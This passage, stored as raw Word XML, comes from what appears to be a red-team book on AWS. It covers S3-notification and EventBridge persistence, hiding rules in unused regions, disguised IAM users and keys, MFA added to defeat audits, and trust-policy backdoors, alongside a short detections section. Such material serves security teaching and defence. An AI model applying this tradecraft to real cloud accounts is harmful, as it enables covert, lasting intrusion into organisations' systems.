        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"LambdaFunctionConfigurations"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: [{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB242D6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="420029073"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"LambdaFunctionArn"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"arn:aws:lambda:us-east-1:111122223333:function:metrics-processor"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBAFBAF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="420029073"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Events"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"s3:ObjectCreated:*"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495650A6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="420029073"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"metrics-v2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F60D59C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="420029073"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  }]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EF8B54" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="420029073"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C0DE32" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="420029073"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12190559" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="420029073"/>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s3api put-bucket-notification-configuration \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EEF15C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="420029073"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --bucket prod-events --notification-configuration file://notification.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAE41F2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="420029073"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># the Lambda pointed to is one the attacker previously modified with lambda:UpdateFunctionCode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6124AD7D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>14.6  Event-pattern subversion: what the defender misses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572086A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EventBridge event patterns can be arbitrarily narrow. An attacker rule with a pattern such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>{ "source": ["aws.iam"], "detail": { "userIdentity": { "principalId": ["AIDA*victim_id*"] } } }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> matches only events involving a specific user — it is virtually invisible in volume metrics, and it costs effectively nothing. The pattern can be constructed to match just CloudTrail events that indicate the organization is investigating the attacker's presence (for example, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>events.name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> starting with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>GetCallerIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> from responder-pattern SourceIPs), giving the attacker a silent early-warning system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DB74C4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="788165763"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Operator note: region sprawl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1B357B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="788165763"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">EventBridge rules are region-scoped. A rule in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>me-central-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not visible to a defender's queries against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>us-east-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>. Organizations that do not operate in every AWS region rarely have detection coverage in those regions. If your persistence rule has to live somewhere, pick a region where the organization has zero workloads but does not block with an SCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DF84F3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>14.7  Serverless-plane detections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FC533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API Gateway access logs (not on by default), CloudWatch Logs metric filters on Lambda invocations, and SNS/SQS/EventBridge CloudTrail management events are the native signals. GuardDuty's cloud coverage includes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Discovery:S3/AnomalousBehavior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> but has no direct EventBridge detection class as of 2025. Tools like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CloudSplaining</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Prowler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> can audit for overly broad resource policies on these services after the fact; they do not detect active abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391239D4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B415EB9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Lambda authorizer caching and API Gateway </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS_IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>-with-wildcard resource policies are the two most common authorization flaws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DB977A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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EventBridge rules are a persistence primitive: an attacker can subscribe to live CloudTrail events without any </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cloudtrail:*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> permission, and cross-region deployment evades regional detection gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344F0CF8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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SNS and SQS resource-policy writes (SetTopicAttributes, AddPermission) allow external subscription and quiet message drain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B16447" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Step Functions state-machine updates inject attacker-controlled states under the existing execution role, equivalent in impact to Lambda code replacement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B60DDFF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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S3 bucket notifications combined with attacker-modified Lambda code produce a persistent-execution primitive scaled to bucket write volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E31502F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="2304" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Part V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DDFF08" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D9538" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="part-blurb"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Once the operator has achieved a foothold and enumerated the IAM landscape, the engagement turns to the post-exploitation phase: stay resident long enough to complete the mission, avoid detection while doing so, and move data out of the environment in a way that is operationally robust against investigation. Part V covers the three phases the way MITRE ATT&amp;CK for Cloud describes them — persistence (TA0003), defense evasion (TA0005), and exfiltration plus impact (TA0010 / TA0040) — but with the specific flav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>our AWS imposes: persistence in AWS is rarely about implants on disk because there is no disk the operator meaningfully controls; it is about creating or modifying control-plane objects that survive credential rotation. Evasion in AWS is rarely about process hiding because there are no processes the operator owns; it is about choosing CloudTrail-friendly identities, blending with automation, and disabling or diverting log streams. Exfiltration in AWS is rarely about network tunnels because the data plane is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> already service-to-service; it is about service-side primitives that move data without crossing the defender's network perimeter at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A271D8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Chapter 15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F61F8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MITRE ATT&amp;CK catalogues nearly twenty cloud persistence techniques; most of them collapse, in AWS, to one of three families. First, identity persistence: create or modify a principal — an IAM user, an access key, a role, a federation trust — that the attacker can use again later. Second, compute persistence: create or modify an execution context — a Lambda function, an EventBridge rule, an EC2 user-data script, a launch template — that runs attacker code on a schedule or in response to an event. Third, conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iguration persistence: create or modify a global account setting — AWS SSO permission sets, Identity Center instance, Organizations SCP, service-level trusts — that broadens the attacker's access in a way a routine credential rotation does not close. This chapter walks each family with the trade-offs among them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0824FA8E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>15.1  Identity persistence: users, keys, and MFA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DACD20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simplest persistence primitive is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:CreateUser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:CreateAccessKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:AttachUserPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. It leaves a CloudTrail trail the size of a highway marker — three events, all on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam.amazonaws.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, all with an obvious username — and it is trivial for a defender to detect if they have any IAM-change alerting. The improved version: use a username that matches an existing pattern (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>svc-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ci-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ghactions-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">) and attach the user to an existing group rather than creating a new policy. The most improved version: do not create a new user at all; instead, add an access key to an existing service user. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:CreateAccessKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a service user produces a CloudTrail event that almost nobody alerts on, because service users rotate their keys as part of normal operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0167F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If the attacker can create or modify an IAM user's console login profile, they can also add MFA. AWS issues virtual MFA devices through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:CreateVirtualMFADevice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:EnableMFADevice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. A legitimate-looking username with MFA enabled is nearly indistinguishable from a real employee account; the presence of MFA defeats the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>IAM user without MFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> compliance audits that some organizations use as a blanket persistence detector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FDAB3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Role-based persistence is superior for two reasons. First, roles do not have long-lived access keys, so rotation is not a path to eviction. Second, roles are assumed by many principals legitimately, so adding an attacker-controlled principal to a role's trust policy (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:UpdateAssumeRolePolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
